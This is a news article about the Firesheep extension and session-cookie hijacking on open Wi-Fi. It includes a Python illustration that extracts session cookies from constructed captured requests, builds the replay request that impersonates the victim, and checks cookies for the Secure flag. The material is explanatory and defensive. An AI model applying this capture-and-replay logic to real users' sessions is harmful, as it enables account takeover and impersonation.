Firefox extension makes social network ID spoofing trivial
A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has driven home to the security world that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.
"When it comes to user privacy, SSL is the elephant in the room," said Eric Butler, the developer of the extension in question, dubbed Firesheep. Most large sites encrypt the login page itself, but then hand the browser a session cookie that is sent back in the clear, over plain HTTP, on every subsequent request. By installing and running Firesheep on a shared network such as open Wi-Fi, anyone can sniff those unencrypted session cookies as other users on the same network segment access social networks, online services and other websites requiring a login, and simply replay them to hijack the session and impersonate the user.
“As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed,” explains Butler. “Double-click on someone, and you’re instantly logged in as them.”
None of this was impossible before the advent of Firesheep, but it required tools and know-how (a packet sniffer, and an understanding of which cookies carry a session) that average Internet users didn't have. "Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win," says Butler.
Whether he will succeed in making the case for encrypting the entire session rather than just the login page, and spur websites into action, remains to be seen. Among the websites whose session cookies Firesheep can identify are Facebook, Flickr, Amazon.com, bit.ly, Google, Twitter, Yahoo, WordPress, and many others.
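To make the mechanism concrete, here is an added illustration of the two halves of the story, the attack described above and the cookie-level fix implied by the call for site-wide SSL. This is example code written for this article, not Firesheep's own source: it parses constructed HTTP requests standing in for packets sniffed on an open network, matches them against a hypothetical handler table (the hostnames `www.example-social.com` and `www.example-shop.com` and the cookie names in it are assumptions, not any real site's cookies), builds the replay request an attacker's browser would send, and finally checks a `Set-Cookie` header for the `Secure` attribute, which is what stops a browser from ever sending the cookie over plain HTTP in the first place.

```python
"""Firesheep-style session capture and replay, plus the Secure-flag check.

Added example, not Firesheep's code. Hosts, cookie names and the captured
requests below are constructed for illustration only.
"""

# Hypothetical handler table: for each site, the cookie names that together
# make up a logged-in session. Firesheep ships one such "handler" per site;
# these names are assumptions for the example, not any real site's cookies.
SESSION_HANDLERS = {
    "www.example-social.com": ("sid", "user"),
    "www.example-shop.com": ("session-id",),
}


def parse_http_request(raw: bytes) -> dict:
    """Split a plaintext HTTP/1.x request into method, path, version, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def parse_cookie_header(value: str) -> dict:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def capture_session(raw: bytes):
    """Return (host, session cookies) if this request leaks a known session, else None."""
    req = parse_http_request(raw)
    host = req["headers"].get("host", "").lower()
    wanted = SESSION_HANDLERS.get(host)
    if not wanted or "cookie" not in req["headers"]:
        return None
    cookies = parse_cookie_header(req["headers"]["cookie"])
    if not all(name in cookies for name in wanted):
        return None  # only part of the session seen; not enough to replay
    return host, {name: cookies[name] for name in wanted}


def build_hijack_request(host: str, session: dict, path: str = "/") -> bytes:
    """Craft the request the attacker's browser sends: stolen cookies, new client.

    The server cannot tell this apart from the victim, because the cookie is
    the only thing that identifies the session.
    """
    cookie_header = "; ".join(f"{k}={v}" for k, v in session.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header}\r\nConnection: close\r\n\r\n").encode()


def cookie_leaks_over_http(set_cookie: str) -> bool:
    """True if a Set-Cookie header lacks the Secure attribute.

    Without Secure, the browser also attaches the cookie to plain-HTTP requests
    to the same site, which is exactly the traffic a sniffer sees.
    """
    attrs = [p.strip().lower() for p in set_cookie.split(";")[1:]]
    return "secure" not in attrs


# Constructed "captured" requests, as they would appear on an open Wi-Fi network.
CAPTURED = [
    b"GET /home HTTP/1.1\r\nHost: www.example-social.com\r\n"
    b"Cookie: sid=abc123; user=42; theme=dark\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: www.example-shop.com\r\nCookie: session-id=s3cr3t\r\n\r\n",
    b"GET /img/logo.png HTTP/1.1\r\nHost: cdn.unrelated.net\r\n\r\n",
]


def harvest(raw_requests):
    """Run every captured request through the handler table; keep the hits."""
    return [s for s in (capture_session(r) for r in raw_requests) if s]


if __name__ == "__main__":
    for host, session in harvest(CAPTURED):
        print(f"session for {host}: {session}")
        print(build_hijack_request(host, session, "/home").decode())
    print(cookie_leaks_over_http("sid=abc123; Path=/; HttpOnly"))          # True
    print(cookie_leaks_over_http("sid=abc123; Path=/; Secure; HttpOnly"))  # False
```

The `theme` cookie is ignored because the handler only cares about the cookies that constitute the login; the third request is ignored because no handler knows that host. The `Secure` attribute alone is not a complete fix: a site that still serves pages over HTTP will simply log the user out of those pages, which is why the lasting answer is to serve the whole session over SSL.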
As I write this, the extension has been downloaded some 8,000 times, and the number is rising by the second. Wouldn't it be amazing if an action such as this brought about the realization of a more secure Internet?